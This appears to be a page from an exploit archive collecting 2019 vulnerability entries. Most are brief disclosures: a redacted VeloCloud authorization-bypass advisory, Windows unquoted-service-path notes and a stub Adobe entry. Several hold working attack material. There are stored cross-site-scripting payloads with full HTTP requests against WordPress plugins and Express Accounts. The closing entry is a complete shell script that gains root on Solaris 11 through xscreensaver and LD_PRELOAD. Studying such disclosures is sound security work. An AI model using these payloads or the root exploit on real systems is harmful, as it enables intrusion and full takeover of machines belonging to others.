VMware VeloCloud versions 3.3.0 and 3.2.2 suffer from an authorization bypass vulnerability.

MD5 | 12195b6551f517aa4bbe3b9c39469f0d

#############################################################
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/research/advisories/
#
#############################################################
#
# Product: VeloCloud
# Vendor: VMware
# CVE ID: CVE-2019-5533
# CSNC ID: CSNC-2019-007
# Subject: Authorization Bypass
# Risk: Moderate
# Effect: Remotely exploitable
# CVSS v3.1 Vector: AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
# Author: Silas Bärtsch
# Date: 10.16.2019
#
#############################################################

Introduction:
-------------
VeloCloud [1], now part of VMware, is a SD-WAN market leader.
VMware SD-WAN by VeloCloud is a key component of the Virtual Cloud Network
and tightly integrated with NSX Data Center and NSX Cloud to enable customers
extend consistent networking and security policies from the data center
to the branch to the cloud. Compass Security [2] identified a vulnerability
that allows a VeloCloud standard admin user to access user information
of other VeloCloud customers.

Affected:
---------
Vulnerable:
3.3.0 and 3.2.2.

Not vulnerable:
3.3.1

No other version was tested, but it is believed for the older versions to be
vulnerable as well.

Technical Description
---------------------
The standard admin user uses the following HTTP request to retrieve
user information. The request contains the id parameter twice. The server
does not perform any authorization checks on this parameter. Changing
it will return the user details of the corresponding user, even if the
returned user details belong to other VeloCloud customers.

```
POST /portal/ HTTP/1.1
Host: vco109-usca1.velocloud.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://vco109-usca1.velocloud.net/
Content-Type: application/json
x-vco-privileges-version: 1560945325637
X-Requested-With: XMLHttpRequest
Content-Length: 90
Cookie: culture=en-US; velocloud.session=[CUT-BY-COMPASS]
Connection: close

{"jsonrpc":"2.0","method":"enterpriseUser/getEnterpriseUser","params":{"id":1},"id":1}
```

The following information is returned.
```
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 19 Jun 2019 13:02:11 GMT
Content-Type: application/json
Content-Length: 569
Connection: close
X-Powered-By: Express
Set-Cookie: velocloud.message=; Path=/; Expires=Thu, 01 Jan 1970 00:00:00 GMT
x-vco-privileges-version: 1560945325637
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Expires: 0
Strict-Transport-Security: max-age=31536000; includeSubdomains;
X-Frame-Options: SAMEORIGIN

{"jsonrpc":"2.0","result":
{
"id":[CUT-BY-COMPASS],
"created":"[CUT-BY-COMPASS]",
"userType":"[CUT-BY-COMPASS]",
"username":"[CUT-BY-COMPASS]",
"domain":[CUT-BY-COMPASS],
"password":"*****",
"firstName":[CUT-BY-COMPASS],
"lastName":[CUT-BY-COMPASS],
"officePhone":[CUT-BY-COMPASS],
"mobilePhone":[CUT-BY-COMPASS],
"email":"[CUT-BY-COMPASS]",
"isNative":[CUT-BY-COMPASS],
"isActive":[CUT-BY-COMPASS],
"isLocked":[CUT-BY-COMPASS],
"disableSecondFactor":[CUT-BY-COMPASS],
"lastLogin":"[CUT-BY-COMPASS]",
"modified":"[CUT-BY-COMPASS]",
"passwordModified":"[CUT-BY-COMPASS]",
"enterpriseId":[CUT-BY-COMPASS],
"enterpriseProxyId":[CUT-BY-COMPASS],
"roleId":[CUT-BY-COMPASS],
"roleName":"[CUT-BY-COMPASS]",
"networkId":[CUT-BY-COMPASS],
"isSuper":[CUT-BY-COMPASS]},
"id":[CUT-BY-COMPASS]
}
```

Workaround / Fix:
-----------------
Upgrade to VeloCloud 3.3.1, where the authorization checks are performed correctly.

Timeline:
---------
2019-10-16: Coordinated public disclosure date
2019-08-26: Assigned CVE-2019-5533
2019-08-21: Release of VeloCloud 3.3.1 which includes a fix for the vulnerability
2019-07-02: Initial vendor response
2019-07-01: Initial vendor notification
2019-06-27: Assigned CSNC-2019-007
2019-06-19: Discovery by Silas Bärtsch

References:
-----------
[1] https://www.velocloud.com
[2] https://compass-security.com

Source

WordPress Soliloquy Lite plugin version 2.5.6 suffers from a persistent cross site scripting vulnerability.

MD5 | f44eca6b3e589bd8c6db25f9b6f9eb86

# Exploit Title: WordPress Soliloquy Lite 2.5.6 - Persistent Cross-Site Scripting
# Google Dork: inurl:"wp-contentpluginssoliloquy-lite"
# Date: 2019-06-13
# Exploit Author: Unk9vvN
# Vendor Homepage: https://soliloquywp.com/
# Software Link: https://wordpress.org/plugins/soliloquy-lite/
# Version: 2.5.6
# Tested on: Kali Linux
# CVE: N/A


# Description
# This vulnerability is in the validation mode and is located in the Prevew of new post inside soliloquy and the vulnerability type is stored ,it happend when a user insert script tag in title input then save the post. everything will be ok until target click on preview of vulnerabil.

1.Go to the 'Add new' section of soliloquy
2.Enter the payload in the "add Title"
3.Select a sample image
4.Click the "Publish" option
5.Click on Preview
6.Your payload will run


# URI: http://localhost/wordpress/wp-admin/post.php?post=50&action=edit
# Parameter & Payoad: post_title=/">alert("Unk9vvN")


#
# POC
#
POST /wordpress/wp-admin/post.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/wordpress/wp-admin/post.php?post=50&action=edit
Content-Type: application/x-www-form-urlencoded
Content-Length: 1599
Cookie: .......
Connection: close
Upgrade-Insecure-Requests: 1
DNT: 1

_wpnonce=d9f78b76e2&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fpost.php%3Fpost%3D50%26action%3Dedit%26message%3D6&user_ID=1&action=editpost&originalaction=editpost&post_author=1&post_type=soliloquy&original_post_status=publish&referredby=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-admin%2Fpost-new.php%3Fpost_type%3Dsoliloquy%26wp-post-new-reload%3Dtrue&_wp_original_http_referer=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-admin%2Fpost-new.php%3Fpost_type%3Dsoliloquy%26wp-post-new-reload%3Dtrue&post_ID=50&meta-box-order-nonce=5e054a06d1&closedpostboxesnonce=03e898cf80&post_title=%22%2F%3E%3Cscript%3Ealert%28%22Unk9vvN%22%29%3C%2Fscript%3E&samplepermalinknonce=fc4f7ec2ab&_soliloquy%5Btype%5D=default&async-upload=&post_id=50&soliloquy=bdfd10296c&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fpost.php%3Fpost%3D50%26action%3Dedit%26message%3D6&_soliloquy%5Btype_default%5D=1&_soliloquy%5Bslider_theme%5D=base&_soliloquy%5Bslider_width%5D=960&_soliloquy%5Bslider_height%5D=300&_soliloquy%5Btransition%5D=fade&_soliloquy%5Bduration%5D=5000&_soliloquy%5Bspeed%5D=400&_soliloquy%5Bgutter%5D=20&_soliloquy%5Bslider%5D=1&_soliloquy%5Baria_live%5D=polite&_soliloquy%5Btitle%5D=%2F%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&_soliloquy%5Bslug%5D=scriptalert1script&_soliloquy%5Bclasses%5D=&wp-preview=dopreview&hidden_post_status=publish&post_status=publish&hidden_post_password=&hidden_post_visibility=public&visibility=public&post_password=&mm=09&jj=13&aa=2019&hh=15&mn=21&ss=21&hidden_mm=09&cur_mm=09&hidden_jj=13&cur_jj=13&hidden_aa=2019&cur_aa=2019&hidden_hh=15&cur_hh=15&hidden_mn=21&cur_mn=21&original_publish=Update

Source

WordPress FooGallery plugin version 1.8.12 suffers from a persistent cross site scripting vulnerability.

MD5 | 677d436e1c2cb3cfb3dc6f9bbff3eddd

# Exploit Title: WordPress FooGallery 1.8.12 - Persistent Cross-Site Scripting
# Google Dork: inurl:"wp-contentpluginsfoogallery"
# Date: 2019-06-13
# Exploit Author: Unk9vvN
# Vendor Homepage: https://foo.gallery/
# Software Link: https://wordpress.org/plugins/foogallery/
# Version: 1.8.12
# Tested on: Kali Linux
# CVE: N/A


# Description
# This vulnerability is in the validation mode and is located in the plugin settings panel and the vulnerability type is stored ,it happend becuse in setting is an select tag ,this select tag have option with value of title gallerys so simply we just have to break option and write our script tag
the vulnerability parameters are as follows.

1.Go to the 'add Gallery' of FooGallery
2.Enter the payload in the "add Title"
3.Click the "Publish" option
4.Go to plugin setting of FooGallery
5.Your payload will run


# URI: http://localhost/wordpress/wp-admin/post-new.php?post_type=foogallery&wp-post-new-reload=true
# Parameter & Payoad: post_title="/>alert("Unk9vvn")


#
# POC
#
POST /wordpress/wp-admin/post.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/wordpress/wp-admin/post-new.php?post_type=foogallery&wp-post-new-reload=true
Content-Type: application/x-www-form-urlencoded
Content-Length: 2694
Cookie: ......
Connection: close
Upgrade-Insecure-Requests: 1
DNT: 1

_wpnonce=933471aa43&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fpost-new.php%3Fpost_type%3Dfoogallery&user_ID=1&action=editpost&originalaction=editpost&post_author=1&post_type=foogallery&original_post_status=auto-draft&referredby=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-admin%2Fedit.php%3Fpost_type%3Dfoogallery%26ids%3D31&_wp_original_http_referer=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-admin%2Fedit.php%3Fpost_type%3Dfoogallery%26ids%3D31&auto_draft=&post_ID=32&meta-box-order-nonce=5e054a06d1&closedpostboxesnonce=03e898cf80&post_title=%22%2F%3E%3Cscript%3Ealert%28%22Unk9vvn%22%29%3C%2Fscript%3E&samplepermalinknonce=fc4f7ec2ab&hidden_post_status=draft&post_status=draft&hidden_post_password=&hidden_post_visibility=public&visibility=public&post_password=&mm=09&jj=13&aa=2019&hh=14&mn=42&ss=45&hidden_mm=09&cur_mm=09&hidden_jj=13&cur_jj=13&hidden_aa=2019&cur_aa=2019&hidden_hh=14&cur_hh=14&hidden_mn=42&cur_mn=42&original_publish=Publish&publish=Publish&foogallery_sort=&foogallery_clear_gallery_thumb_cache_nonce=e18d32a542&_thumbnail_id=-1&_foogallery_settings%5Bfoogallery_items_view%5D=manage&foogallery_nonce=b6066e6407&foogallery_attachments=&foogallery_preview=e35a011572&foogallery_template=default&_foogallery_settings%5Bdefault_thumbnail_dimensions%5D%5Bwidth%5D=150&_foogallery_settings%5Bdefault_thumbnail_dimensions%5D%5Bheight%5D=150&_foogallery_settings%5Bdefault_thumbnail_link%5D=image&_foogallery_settings%5Bdefault_lightbox%5D=none&_foogallery_settings%5Bdefault_spacing%5D=fg-gutter-10&_foogallery_settings%5Bdefault_alignment%5D=fg-center&_foogallery_settings%5Bdefault_theme%5D=fg-light&_foogallery_settings%5Bdefault_border_size%5D=fg-border-thin&_foogallery_settings%5Bdefault_rounded_corners%5D=&_foogallery_settings%5Bdefault_drop_shadow%5D=fg-shadow-outline&_foogallery_settings%5Bdefault_inner_shadow%5D=&_foogallery_settings%5Bdefault_loading_icon%5D=fg-loading-default&_foogallery_settings%5Bdefault_loaded_effect%5D=fg-loaded-fade-in&_foogallery_settings%5Bdefault_hover_effect_color%5D=&_foogallery_settings%5Bdefault_hover_effect_scale%5D=&_foogallery_settings%5Bdefault_hover_effect_caption_visibility%5D=fg-caption-hover&_foogallery_settings%5Bdefault_hover_effect_transition%5D=fg-hover-fade&_foogallery_settings%5Bdefault_hover_effect_icon%5D=fg-hover-zoom&_foogallery_settings%5Bdefault_caption_title_source%5D=&_foogallery_settings%5Bdefault_caption_desc_source%5D=&_foogallery_settings%5Bdefault_captions_limit_length%5D=&_foogallery_settings%5Bdefault_paging_type%5D=&_foogallery_settings%5Bdefault_custom_settings%5D=&_foogallery_settings%5Bdefault_custom_attributes%5D=&_foogallery_settings%5Bdefault_lazyload%5D=&post_name=&foogallery_custom_css=

Source

WorkgroupMail version 7.5.1 suffers from a WorkgroupMail unquoted service path vulnerability.

MD5 | a1d3f466391d651f25f2dd3a69ee3302

# Exploit Title : WorkgroupMail 7.5.1 - 'WorkgroupMail' Unquoted Serive Path
# Date : 2019-10-15
# Exploit Author : Cakes
# Vendor: Softalk
# Version : 7.5.1
# Software: http://html.tucows.com/preview/195580/WorkgroupMail-Mail-Server?q=pop3
# Tested on Windows 10
# CVE : N/A


c:>sc qc WorkgroupMail
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: WorkgroupMail
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:Program Files (x86)WorkgroupMailwmsvc.exe -s
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : WorkgroupMail
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem

Source

Web Companion version 5.1.1035.1047 suffers from a WCAssistantService unquoted service path vulnerability.

MD5 | 0fe04845b92aed952d373cedfbeacea0

# Exploit Title: Web Companion versions 5.1.1035.1047 - 'WCAssistantService' Unquoted Service Path
# Exploit Author: Debashis Pal
# Date: 2019-10-17
# Vendor Homepage : https://webcompanion.com
# Source: https://webcompanion.com
# Version: Web Companion versions 5.1.1035.1047
# CVE : N/A
# Tested on: Windows 7 SP1(64bit)

1. Description:
Web Companion versions 5.1.1035.1047 service 'WCAssistantService' have an unquoted service path.

2. PoC:

C:>sc qc WCAssistantService
sc qc WCAssistantService
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: WCAssistantService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:Program Files (x86)LavasoftWeb CompanionApplicationLavasoft.WCAssistant.WinService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : WC Assistant
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem


3. Exploit:
A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot.
If successful, the local user's code would execute with the elevated privileges of the application.

# Disclaimer
=============
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information.
The author prohibits any malicious use of security related information or exploits by the author or elsewhere.

Source

BlackMoon FTP Server version 3.1.2.1731 suffers from a BMFTP-RELEASE unquoted service path vulnerability.

MD5 | 51b1d0904b198c9c9dcbbf871a24a8b0

# Exploit Title: BlackMoon FTP Server 3.1.2.1731 - 'BMFTP-RELEASE' Unquoted Serive Path 
# Exploit Author: Debashis Pal
# Date: 2019-10-17
# Vendor : Blackmoonftpserver
# Source: http://www.tucows.com/preview/222822/BlackMoon-FTP-Server?q=FTP+server
# Version: BlackMoon FTP Server 3.1.2.1731
# CVE : N/A
# Tested on: Windows 7 SP1(64bit), Windows 7 SP1(32bit)

1. Description:
Unquoted service paths in BlackMoon FTP Server versions 3.1.2.1731 'BMFTP-RELEASE' have an unquoted service path.

2. PoC:

C:>sc qc BMFTP-RELEASE
sc qc BMFTP-RELEASE
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: BMFTP-RELEASE
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:Program Files (x86)Selom OforiBlackMoon FTP ServerFTPService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : BlackMoon FTP Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem


3. Exploit:

A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot.
If successful, the local user's code would execute with the elevated privileges of the application.



# Disclaimer
=============
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information.
The author prohibits any malicious use of security related information or exploits by the author or elsewhere.

Source

Adobe Acrobat Reader DC for Windows suffers from a heap-based buffer overflow vulnerability that can be leveraged via malformed JP2 streams.

MD5 | 6d502d5ca8f705d8234dd901fb623916

Source

Accounts Accounting version 7.02 suffers from a persistent cross site scripting vulnerability.

MD5 | 8d14427d751f0863044b80dbeb9e6753

# Exploit Title: Express Accounts Accounting 7.02 - Persistent Cross-Site Scripting
# Exploit Author: Debashis Pal
# Date: 2019-10-16
# Vendor Homepage: https://www.nchsoftware.com
# Source: https://www.nchsoftware.com/accounting/index.html
# Version: Express Accounts Accounting v7.02
# CVE : N/A
# Tested on: Windows 7 SP1(32bit)

# About Express Accounts Accounting v7.02
=========================================
Express Accounts is professional business accounting software, perfect for small businesses.

# Vulnerability
================
Persistent Cross site scripting (XSS).

# PoC
======

1. Login as authenticated unprivileged user to Express Accounts Accounting v7.02 web enable service i.e http://A.B.C.D:98 [Default installation].
2. Under "Invoices" , Invoices List -> View Invoices -> Add New Invoice -> Customer: Field put alert('XSS');
Save the change.

or

Under "Sales Orders"
Sales Orders -> view Orders -> Add New Order -> New Sales Order ->Customer: Field put alert('XSS');
Save the change.

or

Under "Items"
Items -> Add new item-> Item field: put alert('XSS');
Save the change.

or

Under "Customers"
Customers -> Add New Customer -> Customer Name: put alert('XSS');
Save the change.

or

Under "Quotes"
Quotes -> View Quotes -> Add New Quote -> Customer: put alert('XSS');
Save the change.

3. Login in authenticated privileged or unprivileged user to Express Accounts v7.02 web enable service and visit any of Invoices/Sales Orders/Items/Customers/Quotes section, Persistent XSS payload will execute.

# Disclosure Timeline
======================
Vulnerability Discover Date: 15-Sep-2019.
Vulnerability notification to vendor via vendor provided web form: 15-Sep-2019, 19-Sep-2019, 26-Sep-2019, no responds.
Submit exploit-db : 16-Oct-2019.


# Disclaimer
=============
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information.
The author prohibits any malicious use of security related information or exploits by the author or elsewhere.

Source

LiteManager version 4.5.0 suffers from a romservice unquoted service path vulnerability.

MD5 | 0900a3ce6f8c29d8e6247ccbcb39f51f

# Exploit Title : LiteManager 4.5.0 - 'romservice' Unquoted Serive Path
# Date : 2019-10-15
# Exploit Author : Cakes
# Vendor: LiteManager Team
# Version : LiteManager 4.5.0
# Software: http://html.tucows.com/preview/1594042/LiteManager-Free?q=remote+support
# Tested on Windows 10
# CVE : N/A

c:>sc qc romservice
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: romservice
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:Program Files (x86)LiteManagerFree - ServerROMServer.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : LiteManagerTeam LiteManager
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem

Source

Solaris version 11.4 xscreensaver local privilege escalation exploit.

MD5 | 8d51762f9d56e5990e3285d970927af8

# Exploit Title: Solaris xscreensaver 11.4 - Privilege Escalation
# Date: 2019-10-16
# Exploit Author: Marco Ivaldi
# Vendor Homepage: https://www.oracle.com/technetwork/server-storage/solaris11/
# Version: Solaris 11.x
# Tested on: Solaris 11.4 and 11.3 X86
# CVE: N/A

#!/bin/sh

#
# raptor_xscreensaver - Solaris 11.x LPE via xscreensaver
# Copyright (c) 2019 Marco Ivaldi
#
# Exploitation of a design error vulnerability in xscreensaver, as
# distributed with Solaris 11.x, allows local attackers to create
# (or append to) arbitrary files on the system, by abusing the -log
# command line switch introduced in version 5.06. This flaw can be
# leveraged to cause a denial of service condition or to escalate
# privileges to root. This is a Solaris-specific vulnerability,
# caused by the fact that Oracle maintains a slightly different
# codebase from the upstream one (CVE-2019-3010).
#
# "I'd rather be lucky than good any day." -- J. R. "Bob" Dobbs
# "Good hackers force luck." -- ~A.
#
# This exploit targets the /usr/lib/secure/ directory in order
# to escalate privileges with the LD_PRELOAD technique. The
# implementation of other exploitation vectors, including those
# that do not require gcc to be present on the target system, is
# left as an exercise to fellow UNIX hackers;)
#
# Usage:
# raptor@stalker:~$ chmod +x raptor_xscreensaver
# raptor@stalker:~$ ./raptor_xscreensaver
# [...]
# Oracle Corporation SunOS 5.11 11.4 Aug 2018
# root@stalker:~# id
# uid=0(root) gid=0(root)
# root@stalker:~# rm /usr/lib/secure/64/getuid.so /tmp/getuid.*
#
# Vulnerable platforms:
# Oracle Solaris 11 X86 [tested on 11.4 and 11.3]
# Oracle Solaris 11 SPARC [untested]
#

echo "raptor_xscreensaver - Solaris 11.x LPE via xscreensaver"
echo "Copyright (c) 2019 Marco Ivaldi "
echo

# prepare the payload
echo "int getuid(){return 0;}" > /tmp/getuid.c
gcc -fPIC -Wall -g -O2 -shared -o /tmp/getuid.so /tmp/getuid.c -lc
if [ $? -ne 0 ]; then
echo "error: problem compiling the shared library, check your gcc"
exit 1
fi

# check the architecture
LOG=/usr/lib/secure/getuid.so
file /bin/su | grep 64-bit >/dev/null 2>&1
if [ $? -eq 0 ]; then
LOG=/usr/lib/secure/64/getuid.so
fi

# start our own xserver
# alternatively we can connect back to a valid xserver (e.g. xquartz)
/usr/bin/Xorg :1 &

# trigger the bug
umask 0
/usr/bin/xscreensaver -display :1 -log $LOG &
sleep 5

# clean up
pkill -n xscreensaver
pkill -n Xorg

# LD_PRELOAD-fu
cp /tmp/getuid.so $LOG
LD_PRELOAD=$LOG su -

Source